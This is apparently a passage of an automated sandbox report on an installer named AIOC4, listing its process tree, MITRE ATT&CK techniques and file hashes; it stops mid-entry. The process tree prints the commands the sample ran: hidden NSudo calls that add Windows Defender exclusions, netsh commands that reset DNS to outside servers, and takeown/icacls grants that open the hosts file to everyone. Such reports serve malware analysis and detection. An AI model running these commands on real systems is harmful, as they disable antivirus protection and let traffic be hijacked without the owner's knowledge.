"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe" -U:T -Wait -P:E -ShowWindowMode:Hide REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files\AIOC4\\" /t REG_DWORD /d 0 /f
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe
"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe" -U:S -Wait -P:E -ShowWindowMode:Hide REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files\AIOC4\\" /t REG_DWORD /d 0 /f
6⤵
PID:5620

C:\Program Files\AIOC4\7-Zip\x64\7z.exe
"C:\Program Files\AIOC4\7-Zip\x64\7z.exe" x "C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher.7z" -o"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher" -aoa
6⤵
PID:4260

C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe
"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe" -U:T -Wait -P:E -ShowWindowMode:Hide REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\\" /t REG_DWORD /d 0 /f
6⤵
PID:2284

C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe
"C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe" -U:S -Wait -P:E -ShowWindowMode:Hide REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\\" /t REG_DWORD /d 0 /f
6⤵
PID:2044

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C MD "AIOC_Cache\UpdateError\"
6⤵
PID:5608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Program Files\AIOC4\AIOC_Cache\1407909636.bat"
6⤵
PID:5504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c netsh interface show interface
7⤵
PID:5036

C:\Windows\system32\netsh.exe
netsh interface show interface
8⤵
PID:5508

C:\Windows\system32\netsh.exe
netsh interface ip set dns "Ethernet" static 114.114.114.114
7⤵
PID:5084

C:\Windows\system32\netsh.exe
netsh interface ip add dns "Ethernet" 61.160.195.64
7⤵
PID:756

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TAKEOWN /F "C:\Windows\system32\drivers\etc" /R /D Y
6⤵
PID:5336

C:\Windows\system32\takeown.exe
TAKEOWN /F "C:\Windows\system32\drivers\etc" /R /D Y
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5724

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ICACLS "C:\Windows\system32\drivers\etc" /grant:r Everyone:(OI)(CI)(F)
6⤵
PID:3808

C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\system32\drivers\etc" /grant:r Everyone:(OI)(CI)(F)
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5288

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C TAKEOWN /F "C:\Windows\system32\drivers\etc\hosts"
6⤵
PID:5800

C:\Windows\system32\takeown.exe
TAKEOWN /F "C:\Windows\system32\drivers\etc\hosts"
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5224

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ICACLS "C:\Windows\system32\drivers\etc\hosts" /grant:r Everyone:(F)
6⤵
PID:5768

C:\Windows\system32\icacls.exe
ICACLS "C:\Windows\system32\drivers\etc\hosts" /grant:r Everyone:(F)
7⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1260

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ATTRIB -R -H -S "C:\Windows\system32\drivers\etc\hosts" /S /D /L
6⤵
PID:1532

C:\Windows\system32\attrib.exe
ATTRIB -R -H -S "C:\Windows\system32\drivers\etc\hosts" /S /D /L
7⤵
- Views/modifies file attributes
PID:4080

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C w32tm /resync
6⤵
PID:3712

C:\Windows\system32\w32tm.exe
w32tm /resync
7⤵
PID:2776

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4840

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:4208

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:3392

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:1716

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\AIOC4\7-Zip\x64\7z.dll
Filesize
1.6MB

MD5
3c0e5f27997c83592a01feb4c1fc0754

SHA1
3d7920deb74e340a1ccac024b3f8239eb436c11f

SHA256
4d52d2213bb8417737c1824013d5253c8b82174ea69da3f4be5ccfb220bec243

SHA512
83e5bc1e152b901497d17b02a26ca2b66ecc26b0029d2323da8665e90405390a67df56af04738d2f05b4d9c13307fa2bfa7ad0c74f2d342f014e8648ab35aedb

Download Submit
C:\Program Files\AIOC4\7-Zip\x64\7z.dll
Filesize
1.6MB

MD5
3c0e5f27997c83592a01feb4c1fc0754

SHA1
3d7920deb74e340a1ccac024b3f8239eb436c11f

SHA256
4d52d2213bb8417737c1824013d5253c8b82174ea69da3f4be5ccfb220bec243

SHA512
83e5bc1e152b901497d17b02a26ca2b66ecc26b0029d2323da8665e90405390a67df56af04738d2f05b4d9c13307fa2bfa7ad0c74f2d342f014e8648ab35aedb

Download Submit
C:\Program Files\AIOC4\7-Zip\x64\7z.dll
Filesize
1.6MB

MD5
3c0e5f27997c83592a01feb4c1fc0754

SHA1
3d7920deb74e340a1ccac024b3f8239eb436c11f

SHA256
4d52d2213bb8417737c1824013d5253c8b82174ea69da3f4be5ccfb220bec243

SHA512
83e5bc1e152b901497d17b02a26ca2b66ecc26b0029d2323da8665e90405390a67df56af04738d2f05b4d9c13307fa2bfa7ad0c74f2d342f014e8648ab35aedb

Download Submit
C:\Program Files\AIOC4\7-Zip\x64\7z.exe
Filesize
472KB

MD5
8fc504a26d59a4459604755ffcafeb4f

SHA1
d503ae8d5ad76948858cfff34858c5de5a5b96d6

SHA256
447fbf5ac436c7e2a4a90a1e7ce56f1970605e36b2c54daaa0f913701004ed78

SHA512
d69fd03a95d27cdb8dba1fcb392a143b3547cdff125e62d5cf135af232041d651263f5105e35e98609669c3d8c65568ff76dfe092c6220c7b3625dd4d84c8817

Download Submit
C:\Program Files\AIOC4\7-Zip\x64\7z.exe
Filesize
472KB

MD5
8fc504a26d59a4459604755ffcafeb4f

SHA1
d503ae8d5ad76948858cfff34858c5de5a5b96d6

SHA256
447fbf5ac436c7e2a4a90a1e7ce56f1970605e36b2c54daaa0f913701004ed78

SHA512
d69fd03a95d27cdb8dba1fcb392a143b3547cdff125e62d5cf135af232041d651263f5105e35e98609669c3d8c65568ff76dfe092c6220c7b3625dd4d84c8817

Download Submit
C:\Program Files\AIOC4\7-Zip\x64\7z.exe
Filesize
472KB

MD5
8fc504a26d59a4459604755ffcafeb4f

SHA1
d503ae8d5ad76948858cfff34858c5de5a5b96d6

SHA256
447fbf5ac436c7e2a4a90a1e7ce56f1970605e36b2c54daaa0f913701004ed78

SHA512
d69fd03a95d27cdb8dba1fcb392a143b3547cdff125e62d5cf135af232041d651263f5105e35e98609669c3d8c65568ff76dfe092c6220c7b3625dd4d84c8817

Download Submit
C:\Program Files\AIOC4\AIOC4.exe
Filesize
7.3MB

MD5
8d22332dfd13fb7b23ee933d5d13680b

SHA1
40ea83aae67d765159ee98ca68d3679696501d5f

SHA256
1c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437

SHA512
cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa

Download Submit
C:\Program Files\AIOC4\AIOC4.exe
Filesize
7.3MB

MD5
8d22332dfd13fb7b23ee933d5d13680b

SHA1
40ea83aae67d765159ee98ca68d3679696501d5f

SHA256
1c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437

SHA512
cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa

Download Submit
C:\Program Files\AIOC4\AIOC4.exe
Filesize
7.3MB

MD5
8d22332dfd13fb7b23ee933d5d13680b

SHA1
40ea83aae67d765159ee98ca68d3679696501d5f

SHA256
1c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437

SHA512
cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa

Download Submit
C:\Program Files\AIOC4\AIOC4.exe
Filesize
7.3MB

MD5
8d22332dfd13fb7b23ee933d5d13680b

SHA1
40ea83aae67d765159ee98ca68d3679696501d5f

SHA256
1c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437

SHA512
cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa

Download Submit
C:\Program Files\AIOC4\AIOC4.exe
Filesize
7.3MB

MD5
8d22332dfd13fb7b23ee933d5d13680b

SHA1
40ea83aae67d765159ee98ca68d3679696501d5f

SHA256
1c6c70208196f2c6fd8bc1098a3ac98aff2d66cde2bae93358135a91a9421437

SHA512
cc1cd719d6c6e06f04868df984fdbba7f5cb1b69315a8d59e804cc6227ce79c1558ad306394e3f118ec87073c273d98711cc63b01275c861879d0258160214fa

Download Submit
C:\Program Files\AIOC4\AIOC4.exe.config
Filesize
294B

MD5
312788103822de83bfcc14977cf85ce2

SHA1
ad849ac3d9f865f51233ef91069b195768a72e08

SHA256
42bb5911dc77bee5fef62a7557d76f57e03a615900ebc720cd0a8b7573e3fa3b

SHA512
dd8140619b7b31b0195671080f3ee4a18197458835fc9c38e3a5f02c15b539ba92dcd978bf0231ed4857e3a0b9215a8df860503099542bf5b0d87821ff0b2558

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\1407909636.bat
Filesize
394B

MD5
1674c8ec8f0267dc45853ac0cbc25d56

SHA1
35d4f82bd7e8c4db2b4f0133c9594d70d00eb15a

SHA256
ed4347c35495059f1b3ea0f066ee53c81b1b934da3d54cca433250e5eb07fea5

SHA512
21b7a3d59783adfb572b87031cef2ac9f457bff5ea449814a9a33450cf7c8ebf94169599908af02e9819475b93c10ca0569f4f53dde72af1f2a5cd536c927b8d

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\JServer.XML
Filesize
3KB

MD5
d2b5064c27616136cfedadb391a27de2

SHA1
357f45eda635ef54074d57bda4cb499b6a0f51bc

SHA256
249938dd3dad92a65a9e6e1a5103b1d17e82afeb6dc2880273b901e08631e49d

SHA512
0433bc503f78eed90f6ce99abba3c9a7e0d7ae83c6c12e122ee1dd0d6636fae8253727e845d9a5ec2da23eb4db85c5a2fc2240c1af010ae71cc00ad29dc132f0

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher.7z
Filesize
2.5MB

MD5
bf1324d35b37d4c2283ca20351b05aea

SHA1
b09912a252b29a2da6d869cfee40aff247b49e8a

SHA256
e0eb38802df4fb7d07823337b5c6da941f99b189defc89d35d2df80a5a6d0488

SHA512
f1d9169ad65d54bd8297ac294ca6791ea37c9a739e0805c355640bde88acf20f433a142c175908a533ce18bcc2b9bdcb2a14ac472b8e4d0845b1410bae36d380

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudo.json
Filesize
211B

MD5
922322fab45a284dbb248760125dfb1c

SHA1
120e77b90baa85287b2ee5bc63ff7dcd149767b5

SHA256
254beac232a7bb20289b0608db5a0ccc69789fb8befe2bf3c76fa09953eea6f5

SHA512
899dc404559518e311343a0a71ef4f88e4820268ff821082400660647259594cb1a088359c75b17f4e0df85ea5ad91e49b3e86f636e95955c2c56f1e667f4aaf

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLC.exe
Filesize
130KB

MD5
9927132299134787994eedd49aca8446

SHA1
cbcace85923e335bb37e8b6e634fb6a98c22a8e9

SHA256
1567615d183ef92472f20c6a70800a00bd7e834ddc3016c6f4c725d38cbf68d7

SHA512
d810d4e8e8f97ac47ef60fe65ca79041f3be75112e4079109b34d49fe44f2fe5462b92863592dce83fc5e33808ced670a431b583732da6244a1fa60e832cd6c7

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLC.pdb
Filesize
2.0MB

MD5
84a46255a1d093ac022be86b316a715b

SHA1
9bba555d9226c454bf886228bd8d411d4006d1f3

SHA256
3c0ce2e72e82110faa6f7ee43d66da1b65ae886754644263cccb4bd1beaffb14

SHA512
379bb59da1e0aded1b28535aca3312c5cf61d6a7e969100cf3c889a8b62b3c6cbb359b04c4105a815e9e7f7411494420842c00a8b355abf51b0d59cbcc54652e

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLG.exe
Filesize
149KB

MD5
ecb684e37a8d5fc9fc0dd2d12ec4695a

SHA1
c76e31d62c9ebf650c708ce31897bad7de285bcc

SHA256
5825f03916aadc2d268f376beb29e52bec9b031045bbff728d300164a81e14a2

SHA512
295d21df45516d611ca18ce9cc6ff1be3f4b5315927d2fde071bb3614664ccb998786736f2a70afb74a0602d1c9fa6867376d3af295b78006d715ef487ef4440

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\ARM64\NSudoLG.pdb
Filesize
4.0MB

MD5
859d1a5661742c998f3bce668de4b594

SHA1
673e8dc32a0a13f25431ac82f7b6498ee512552a

SHA256
b7e2c43d68b6a849e46305f7313ec161f994c38609750d6a788ee8944e8b1b24

SHA512
550268f514dc641101b0f0cd6453a7cbb7076f9fca2e72e7372d42cf5d5eb2bbf773ceae1ae2245021cca00f5f0b25886edafa2fd5bcbd7140e8b6811dd92578

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\NSudo.bat
Filesize
234B

MD5
943b19a7ab8b31c13d6359345389e802

SHA1
562ee7a4b7f481fb43b1cf55144de39005dadab4

SHA256
1b770ee7c2c58cc069d992cfd13def84c11cf3ed51559f365f4fed829359b54d

SHA512
df90f2f716acbccbcdbb64981bf3f8727e34ecb8420c32c3bdc2f69e3e9edaeb31e4f815b95ed0b0ae60a86349fa39b81b6030848862403554bb00fcfde24967

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudo.json
Filesize
211B

MD5
922322fab45a284dbb248760125dfb1c

SHA1
120e77b90baa85287b2ee5bc63ff7dcd149767b5

SHA256
254beac232a7bb20289b0608db5a0ccc69789fb8befe2bf3c76fa09953eea6f5

SHA512
899dc404559518e311343a0a71ef4f88e4820268ff821082400660647259594cb1a088359c75b17f4e0df85ea5ad91e49b3e86f636e95955c2c56f1e667f4aaf

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudoLC.exe
Filesize
123KB

MD5
f2234dbe80136d9bd03417b9c0f4a48c

SHA1
233e2c88e8fc719f80f10e016a1fa4f99e5a7ede

SHA256
0c6556ff186fdf38207fb4f38a1157b24834777c2e4390c10b829b7fd1064fd7

SHA512
fe444173fd26ddb2f7b40822de5264c13b52e03f2bd1fbbe2422e1c2cecb68e1311d107d7a735e7ef8129d6d8877c6db093027737b2ca74f0800967255df847c

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudoLC.pdb
Filesize
2.1MB

MD5
74a6d09e9eb9b9857741ec919274ee52

SHA1
c2f271971908a06c45248b62ebe3432c46ed3aba

SHA256
a39630d8d8dd72225cc32f6f349ed9f70f37e673321605258c194da7021b7b0b

SHA512
0a5f0d141a44880a48fc0b3db8ee8ab063ca6318e910ccdf396817bc4080128d52fb3e0501df3cefede754a5e3ec31ac9189106d28e7190100bbf721215239e4

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudoLG.exe
Filesize
136KB

MD5
7b1cd7d63a0b6ae36405d6ef55d30370

SHA1
ec8e5d315c99481b4d716f7e83135d1e8c3bf055

SHA256
2fa4b5886544bd75a1aea73ee961edef4e8e771dd14f203fd88f5493780c3ef7

SHA512
6530f78a3e71303e759dfeb5054c5e96a46fb8175ba7a62112ca360cc453c2fb7138aa8ca70f00c691c900e3b250cbdbd8764216239e623ef2d0db1960091f25

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\Win32\NSudoLG.pdb
Filesize
4.1MB

MD5
5560db809289678cb029f5c68ddfea2b

SHA1
634e532a50c3030bec5a93f5e806094518ef77e8

SHA256
f93c74224ba353990b3f5bf245d8a572a431421041caf219973eef289fe36890

SHA512
22f0d5ecf9a9e09761f42e663b4e4cfc7533f2c3037bf2b77b8511a02caa8e3396b797fe9f6e1a4a508a3451c007f17f6757cadc8ac6ccd7216bc8ae54d1c38e

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudo.json
Filesize
211B

MD5
922322fab45a284dbb248760125dfb1c

SHA1
120e77b90baa85287b2ee5bc63ff7dcd149767b5

SHA256
254beac232a7bb20289b0608db5a0ccc69789fb8befe2bf3c76fa09953eea6f5

SHA512
899dc404559518e311343a0a71ef4f88e4820268ff821082400660647259594cb1a088359c75b17f4e0df85ea5ad91e49b3e86f636e95955c2c56f1e667f4aaf

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudo.json
Filesize
211B

MD5
922322fab45a284dbb248760125dfb1c

SHA1
120e77b90baa85287b2ee5bc63ff7dcd149767b5

SHA256
254beac232a7bb20289b0608db5a0ccc69789fb8befe2bf3c76fa09953eea6f5

SHA512
899dc404559518e311343a0a71ef4f88e4820268ff821082400660647259594cb1a088359c75b17f4e0df85ea5ad91e49b3e86f636e95955c2c56f1e667f4aaf

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLC.exe
Filesize
137KB

MD5
b1300a6d54e1cdad931a55aa6e13915f

SHA1
e3dd555f85c9688de691dd1dfeabee9d6ec1b6ce

SHA256
0078824ff64bdbc2640a654e0c0e0392534d146749ded592a150e64354ed280e

SHA512
136fafb6bf570b47d6eee68ebfefafb73062cb95f0cc22ae6c606a0bd1d072d2e5bfdb1723bc55cfb16fd253d335fa019126dc14d41489334107dbb909172633

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLC.pdb
Filesize
2.0MB

MD5
089787075ee13eb21a5380f15977d6cb

SHA1
ca732f3cd420aba9b1d35ea881131ef98b3fde61

SHA256
46aa7906dd2e7e89967000de10728dab4d1139cfe7e4b2fd625c1be7120f3174

SHA512
616afc839fd026795a1b97352edca7c3614d30a2d2834fffc24588f9c139778f9865f362b7b6b528c341f6cf2f6f6cb4ccc0ee15358f042e99f7293ee64723b5

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe
Filesize
156KB

MD5
7aacfd85b8dff0aa6867bede82cfd147

SHA1
e783f6d4b754ea8424699203b8831bdc9cbdd4e6

SHA256
871e4f28fe39bcad8d295ae46e148be458778c0195ed660b7db18eb595d00bd8

SHA512
59cce358c125368dc5735a28960ddb7ee49835ca19f44255a7ae858ddd8a2db68c72c3f6818eca3678d989041043876e339f9fafe1d81d26001286494a8014f0

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe
Filesize
156KB

MD5
7aacfd85b8dff0aa6867bede82cfd147

SHA1
e783f6d4b754ea8424699203b8831bdc9cbdd4e6

SHA256
871e4f28fe39bcad8d295ae46e148be458778c0195ed660b7db18eb595d00bd8

SHA512
59cce358c125368dc5735a28960ddb7ee49835ca19f44255a7ae858ddd8a2db68c72c3f6818eca3678d989041043876e339f9fafe1d81d26001286494a8014f0

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe
Filesize
156KB

MD5
7aacfd85b8dff0aa6867bede82cfd147

SHA1
e783f6d4b754ea8424699203b8831bdc9cbdd4e6

SHA256
871e4f28fe39bcad8d295ae46e148be458778c0195ed660b7db18eb595d00bd8

SHA512
59cce358c125368dc5735a28960ddb7ee49835ca19f44255a7ae858ddd8a2db68c72c3f6818eca3678d989041043876e339f9fafe1d81d26001286494a8014f0

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe
Filesize
156KB

MD5
7aacfd85b8dff0aa6867bede82cfd147

SHA1
e783f6d4b754ea8424699203b8831bdc9cbdd4e6

SHA256
871e4f28fe39bcad8d295ae46e148be458778c0195ed660b7db18eb595d00bd8

SHA512
59cce358c125368dc5735a28960ddb7ee49835ca19f44255a7ae858ddd8a2db68c72c3f6818eca3678d989041043876e339f9fafe1d81d26001286494a8014f0

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe
Filesize
156KB

MD5
7aacfd85b8dff0aa6867bede82cfd147

SHA1
e783f6d4b754ea8424699203b8831bdc9cbdd4e6

SHA256
871e4f28fe39bcad8d295ae46e148be458778c0195ed660b7db18eb595d00bd8

SHA512
59cce358c125368dc5735a28960ddb7ee49835ca19f44255a7ae858ddd8a2db68c72c3f6818eca3678d989041043876e339f9fafe1d81d26001286494a8014f0

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.exe
Filesize
156KB

MD5
7aacfd85b8dff0aa6867bede82cfd147

SHA1
e783f6d4b754ea8424699203b8831bdc9cbdd4e6

SHA256
871e4f28fe39bcad8d295ae46e148be458778c0195ed660b7db18eb595d00bd8

SHA512
59cce358c125368dc5735a28960ddb7ee49835ca19f44255a7ae858ddd8a2db68c72c3f6818eca3678d989041043876e339f9fafe1d81d26001286494a8014f0

Download Submit
C:\Program Files\AIOC4\AIOC_Cache\Tools\NSudoLauncher\x64\NSudoLG.pdb
Filesize
4.1MB

MD5
231333f0b75d9cdb2dd601c50fc6694e

SHA1
255b8b6dd68bcb0815538e8501d093884bd22846

SHA256
64bff7e9d10c26d2f1d61e38d0a02fee867da1c38289f95275080feaa5068392

SHA512
f8559cfab69d45c81d7f45f4be69330a84bc9154916b4e7ffa835f71fa6efca8062c7227ef49f09b3320481bb8d1a2d7bdceee07c505862b19f189a548c0eade

Download Submit
C:\Program Files\AIOC4\CSkin.dll
Filesize
2.6MB

MD5
64788240f6be72aa31ee2ec5fd511bd0

SHA1
c762fc8df14fc668de1954f80c5d5865b2a4ed8f

SHA256
bd4c6bf0564d0df979fdd370dfefb7f0038a041c05f1a4185ba60b8c1554e351

SHA512
421b71001f28f2ba134ab38ac8b0d84d4e8bba468c122691b69bfd795121bfc64a61f8b22768c44b8d7f88c26c86af7261adbd8c077e16ed808f1690b3b546b3

Download Submit
C:\Program Files\AIOC4\DemoControls.dll
Filesize
38KB

MD5
676aaa728ea0244ac1db9485063b0a55

SHA1
4aca0bace946103ee5a7f0be4b6d81a5132ed213

SHA256
a0e9c2c3f1ddc3c849b793e2a0f4c241ba36613e891533d34ab98f13cd0692e4

SHA512
17e5e21f10c982438b3909a3f0ffeb532e5f9b134439bcfc8e4f33ab2f7b11349d6dc1afe8256e338f39e3034a51f7029dc9f46fb2c0a4320994602e10b2103b

Download Submit
C:\Program Files\AIOC4\Language\801A048D8E177F0C7D7B71C4336E985F\zh-CN.ini
Filesize
23KB

MD5
43bfcf915e323fe9d566d21c16bb6b44

SHA1
ad4838c856cc273fe60e5318812fe8ba95b28ddf

SHA256
c931cbca45d0afc47b4974ca146cb9f58ac1f26b71ec706940c2c7962dc1edc8

SHA512
1ea3b3e9b96089388e0b5ab04ee68fa365367801a4c4b20c7bf4e54449d90aa267a9d80e079d2ae3c4a5b5564bb9e978c6bbe4bf7223dc4571668b29afdb0ebb

Download Submit
C:\Program Files\AIOC4\MetroFramework.dll
Filesize
345KB

MD5
34ea7f7d66563f724318e322ff08f4db

SHA1
d0aa8038a92eb43def2fffbbf4114b02636117c5

SHA256
c2c12d31b4844e29de31594fc9632a372a553631de0a0a04c8af91668e37cf49

SHA512
dceb1f9435b9479f6aea9b0644ba8c46338a7f458c313822a9d9b3266d79af395b9b2797ed3217c7048db8b22955ec6fe8b0b1778077fa1de587123ad9e6b148

Download Submit
C:\Program Files\AIOC4\Newtonsoft.Json.dll
Filesize
528KB

MD5
8f6875148b45c300b95514cb40703c2e

SHA1
0015b8e21d84e0f6f174cf71b63651bad94582df

SHA256
ea7fd75e2bb069699d4da09f3601d70ca8e401f58949178cdbf2c5928720daa1

SHA512
e0670c00e0c5cb0e0e1c691f053a53de121e1771cffb17b2d08b8cc3f0498bdde3c6efe1419fd74103952a327c26bb6f29e5f817965873f8391ee8b8be80a6fb

Download Submit
C:\Program Files\AIOC4\PrimaryScreen.exe
Filesize
6KB

MD5
9804bfc5506b540fda28bef7eed0d872

SHA1
06fad96feb4df2c22b0708afaafd26c22e2ea0a0

SHA256
8ceb687387487842db526c503335c6a3be23106c771eaae3bbfa834581b4b217

SHA512
a6b44a7a0e3757411ff9bdacf4243167232d1aae18519dc99869dac5345df3c5d67f12d58ae6870de2c4b4c4ae7942fba4c0118bbb5b5e7abccd0fff7b6e884d

Download Submit
C:\Program Files\AIOC4\PrimaryScreen.exe
Filesize
6KB

MD5
9804bfc5506b540fda28bef7eed0d872

SHA1
06fad96feb4df2c22b0708afaafd26c22e2ea0a0

SHA256
8ceb687387487842db526c503335c6a3be23106c771eaae3bbfa834581b4b217

SHA512
a6b44a7a0e3757411ff9bdacf4243167232d1aae18519dc99869dac5345df3c5d67f12d58ae6870de2c4b4c4ae7942fba4c0118bbb5b5e7abccd0fff7b6e884d

Download Submit
C:\Program Files\AIOC4\PrimaryScreen.exe
Filesize
6KB

MD5
9804bfc5506b540fda28bef7eed0d872

SHA1
06fad96feb4df2c22b0708afaafd26c22e2ea0a0

SHA256
8ceb687387487842db526c503335c6a3be23106c771eaae3bbfa834581b4b217

SHA512
a6b44a7a0e3757411ff9bdacf4243167232d1aae18519dc99869dac5345df3c5d67f12d58ae6870de2c4b4c4ae7942fba4c0118bbb5b5e7abccd0fff7b6e884d

Download Submit
C:\Program Files\AIOC4\PrimaryScreen.exe
Filesize
6KB

MD5
9804bfc5506b540fda28bef7eed0d872

SHA1
06fad96feb4df2c22b0708afaafd26c22e2ea0a0

SHA256
8ceb687387487842db526c503335c6a3be23106c771eaae3bbfa834581b4b217

SHA512
a6b44a7a0e3757411ff9bdacf4243167232d1aae18519dc99869dac5345df3c5d67f12d58ae6870de2c4b4c4ae7942fba4c0118bbb5b5e7abccd0fff7b6e884d

Download Submit
C:\Program Files\AIOC4\StartNetApp.exe
Filesize
513KB

MD5
b8898b34fd4a62c12bd9828e22ac3e1d

SHA1
6ceea0d3619fec5eedb8fa8ecfe37cc5defc87a8

SHA256
9cbe39bc416069bf5f46a9c9be411f887eea4cb691199e217a6a025dd798b2b3

SHA512
91cfe842b660e54b63387485b882e00d617c5ca1d7cbff107fa6db9f7b898e85c5148d7a0355b5061adc21d0c17df2e3e4b2e99c721c63e322a7abcc0768c494

Download Submit
C:\Program Files\AIOC4\StartNetApp.exe
Filesize
513KB

MD5
b8898b34fd4a62c12bd9828e22ac3e1d

SHA1
6ceea0d3619fec5eedb8fa8ecfe37cc5defc87a8

SHA256
9cbe39bc416069bf5f46a9c9be411f887eea4cb691199e217a6a025dd798b2b3

SHA512
91cfe842b660e54b63387485b882e00d617c5ca1d7cbff107fa6db9f7b898e85c5148d7a0355b5061adc21d0c17df2e3e4b2e99c721c63e322a7abcc0768c494

Download Submit
C:\Program Files\AIOC4\aria2\x64\aria2c.exe
Filesize
4.9MB

MD5
c5e143b5f381ac849e7a1b59a6dcbfa0

SHA1
12367ba9905921509f01b8b944af012011cc95b6

SHA256
b151764ecbb164f25f8aeca3b93e0a18b63d108bbb1f33982fe4eea46b8ecab9

SHA512
d7040e8e18bf200d8f6ac5bb653b4329cb2a38d8a96e6b0ca17b6e3f0a35bd68b32f32925fe6731b195a797f275607448a06594f0f2424b8b48fca3dfa144bfa

Download Submit
C:\Program Files\AIOC4\aria2\x64\aria2c.exe
Filesize
4.9MB

MD5
